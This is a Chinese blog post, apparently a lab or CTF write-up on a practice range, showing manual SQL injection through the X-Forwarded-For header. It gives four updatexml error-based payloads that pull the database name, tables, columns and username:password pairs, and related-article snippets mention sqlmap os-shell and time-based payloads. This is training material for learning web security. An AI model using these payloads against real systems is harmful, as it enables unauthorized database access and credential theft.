x-forwarded-for手工注入(超详细)

最新推荐文章于 2024-05-11 22:05:45 发布
最新推荐文章于 2024-05-11 22:05:45 发布
阅读量1.1k 收藏 1
点赞数
文章标签: web安全 渗透测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jinzezhi/article/details/124742314
版权

使用靶场来进行演示。

访问靶场后看到的是一个常见的后台的登录框,第一步肯定是先试一下看看有没有弱口令咯,试了几个发现并不存在弱口令,但是发现网站有一串乱码的弹窗如下

虽然是乱码,但是看到里面有ip,头发短见识多得我就想到了这大概率是记录下了我本机的ip(这里的ip是开了隧道的不是我的哦~)让我们来抓包看一下

 这里可以看到转编码之后确实是记录了我的ip,但是在请求包中没有发现xff头,就很奇怪,自己加上。

发现xff头的内容是可以随便控制的,下面可以看到输入单引号是报错的,那就直接尝试报错注入

获取到数据库名称

',updatexml(1,concat(0x7e,(select database()),0x7e),1))#

获取到表名

' or updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='webcalendar'),0x7e),1))#

 获取到字段名

' or updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='user'),0x7e),1))#

 最后获取到数据是账号和密码

' or updatexml(1,concat(0x7e,(select group_concat(username,':',password)from user limit 0,1),0x7e),1))#

 

拿着获取到的账号密码返回登录框进行登录获取到key 

不要一味局限于使用工具...

@A1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Chrome插件:X-Forwarded-For Header
12-15
X-Forwarded-For Header插件,此扩展允许您快速设置X-Forwarded-For HTTP标头
简单了解SQL宽字节注入与httpXFF注入(基于sqllabs演示)
Welcome To Myon'Blog !
12-29 955
HTTP XFF注入(X-Forwarded-For Injection),攻击者在HTTP请求中伪造XFF头,将恶意代码注入到HTTP请求头中,从而执行SQL注入攻击。提示我们输入的单引号被转义符 \ 进行了转义,即转义符自动的出现在输入的特殊字符前面,这是防止sql注入的一种方法,导致无法产生报错。因为这里并没有看到关于我们输入的1,2,3的回显位置,因此采用报错注入。至此,关于SQL注入的内容全部结束,后续我们将进入其他Web漏洞的学习。使用单引号尝试闭合,出现SQL语句报错,因此确实存在注入
攻防世界-xff_referer
最新发布
MateSnake的博客
05-11 343
攻防世界-xff_referer
X-Forwarded-For注入漏洞实战
Language_Sumuzhe的博客
05-23 7654
题目:X-Forwarded-For注入漏洞实战 知识点: 是HTTP请求头中XFF的伪造和应用,是一道借用XFF来爆破数据库、表、列以及列值的题目。先输入账户为admin,密码为123456进行登录尝试,出现了弹窗,仔细观察弹窗会发现类似IP地址格式的112.111.12.126数据存在,猜测这是服务端记录并显示了客户端的IP地址。 首先了解服务端如何获取客户端请求IP地址? 服务端获取客户端请求IP地址,常见的包括:x-forwarded-for、client-ip等请求头,以及remote_add
Web应用程序漏洞-X-Forwarded-For注入
旺仔Sec&blog
07-20 2974
第二十八步,重新审阅刚刚获取os-shell时的日志,发现sqlmap在网站根目录下放置了一个tmpunjoh.php文件(文件名为随机,请注意),可以用于手动上传文件。可以看到,我们从X-Forwarded-For定义的内容,未经过筛选就执行了SQL语句用于查询该IP地址是否在白名单之内,且。第五步,一分钟后扫描结束,切换至Results标签页,可以看到/admin目录被扫描出来,推测该目录为管理员后台地址。第十六步,在BurpSuite中将X-Forwarded-For的值改为一个单引号(’)尝试。
墨者学院 X-Forwarded-For注入漏洞实战
crasher123的博客
06-19 1772
SQLMap是一个基于Python编写的工具,因此需要安装Python。可以从Python官方网站下载Python安装包,也可以使用包管理器进行安装。如果Python已经安装,则会显示Python的版本号。请求信息中多加一条X-Forwarded-For:*得到库表名user和login,继续攻击user表。运行后会显示SQLMap的欢迎信息和命令行帮助。得到数据库名称为webcalender,进行扫描。安装burpsuite和sqlmap。2.安装Python。4.运行SQLMap。
安鸾靶场X-Forwarded-For注入注入,Cooike注入训练,手注+sqlmap操作
AAAAAAAAAAAA66的博客
12-29 939
前言:凡是直接将数据带入数据库查询的,都有可能会导致sql注入。 后台服务器存储着cooike,XFF头的信息,当我们每次发包与后台交互时,后台就会将这我们的数据带入数据库中查询,就会造成Cooike注入XFF注入。 虽然题目好像出了点问题,但不妨碍我们学习。 目录 xff注入 手注 sqlmap Cooike注入 手注 sqlmap命令 方法一 方法二 xff注入 题目链接:http://www.whalwl.work:8010/ 进入之后直接用bp抓包,放在re...
X-Forwarded-For火狐插件
01-10
X-Forwarded-For火狐插件
forwarded:解析HTTP X-Forwarded-For标头
05-11
从请求中解析X-Forwarded-For标头。 以相反的顺序返回地址数组,包括req的套接字地址(即索引0是套接字地址,最后一个索引是最远的地址,通常是最终用户)。 测验 $ npm test 执照 麻省理工学院
X-Forwarded-For Header-crx插件
04-02
此扩展允许您快速更新X-Forwarded-For,X-Originating-IP,X-Remote-IP和X-Remote-Addr HTTP标头,以进行各种测试。 变更日志:v0.6.2-修复了干扰此扩展的Firefox版本的错误v0.6.1-修复了CORS预检请求的问题v0.6.0-...
x-forwarded-forheader1.0.1.1.1
05-01
x-forwarded-forheader1.0.1.1.1火狐老插件,可以直接本地安装在旧版火狐上面,可以用的。
墨者 - X-Forwarded-For注入漏洞实战
qq_24481913的博客
07-31 409
X-Forwarded-For:简称XFF头,代表了HTTP的请求端真实的IP。它被认为是客户端通过HTTP代理或者负载均衡器连接到web服务端获取源ip地址的一个标准(通常一些网站的防注入功能会记录请求端真实IP地址并写入数据库或某文件[通过修改XXF头可以实现伪造IP])。XFF,是X-Forwarded-for的缩写,属于SQL注入的一种,该注入原理是通过修改X-Forwarded-for头对带入系统的dns进行sql注入,达到欺骗服务器执行恶意的SQL命令的效果,从而可以得到网站的数据库内容。
利用X-Forwarded-For进行sql注入
wqj975005563的专栏
06-06 4511
由于系统一般会采用String ip = request.getHeader("X-Forwarded-For");进行获取ip,然后注入者就可以通过X-Forwarded-For请求头信息就行伪造ip,当然了这个ip也可以是一些注入语句,如下X-Forwarded-For:payload';WAITFOR DELAY '0:0:5'--String sql = "select * from ta...
Cookie注入和X-Forwarded-For注入
天天学安全专属博客
11-22 868
Cookie注入和X-Forwarded-For注入,sql注入详解,最详细的sql注入方式,和sql注入语句
X-Forwarded-For sql注入
good good study
01-12 4029
什么是X-Forwarded-For X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。当今多数缓存服务器的使用者为大型ISP,为了通过缓存的方式来降低他们的外部带宽,他们常常通过鼓励或强制用户使用代理服务器来接入互联网。有些情况下, 这些代理服务器是透明代理, 用户甚至不知道自己正在使用代理上网。 如果没有XFF或者另外一种相似的技术,所有通过代理服务器的连接只会显示代理服务器的IP地址(而非连接发起的原始I
SQL注入XFF注入攻击
coderge's CSDN Blog.
09-19 3045
目录 在线靶场地址:https://www.mozhe.cn/bug/detail/10 背景介绍 实训目标 解题方向 获取当前数据库的库名 然后获取表名 再获取字段名: 然后获得数据: 在线靶场地址:https://www.mozhe.cn/bug/detail/10 背景介绍 某业务系统,安全工程师"墨者"进行授权黑盒测试,系统的业主单位也没有给账号密码,怎么测? 实训目标 掌握SQL注入的基本原理; 了解服务器获取客户端IP的方式; 了解SQL注入的工具使用; 解题...
墨者学院-HTTP头注入漏洞测试(X-Forwarded-for)-手工注入
mutou990的博客
08-03 1560
一、审题 这题从题目,也可以看放包后的回显可以知道是http头的ip注入,尝试(题目有说)x-forwarded-for(这里的注入我很难主动想到,因为在原始的http头里没有x-forwarded-for,这题是题目有提醒) 二、判断类型 使用brupsuit抓包,repeater后添加XFF头 ——X-Forwarded-For: 通过修改X-Forwarded-For:值来找出注入点。 当值为"(双引号)时,X-Forwarded-For:" 不报错; 当值为‘’(单引号)时,X-Forwarded
x-forwarded-for注入漏洞
03-16
x-forwarded-for注入漏洞是一种网络安全漏洞,攻击者可以通过伪造HTTP请求头中的x-forwarded-for字段,来欺骗服务器认为请求来自于受信任的IP地址,从而绕过IP地址过滤等安全措施,进而进行攻击。这种漏洞常见于代理服务器、负载均衡器等中间件设备。为了防范此类漏洞,应该对HTTP请求头进行严格的过滤和验证,确保请求来源的合法性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值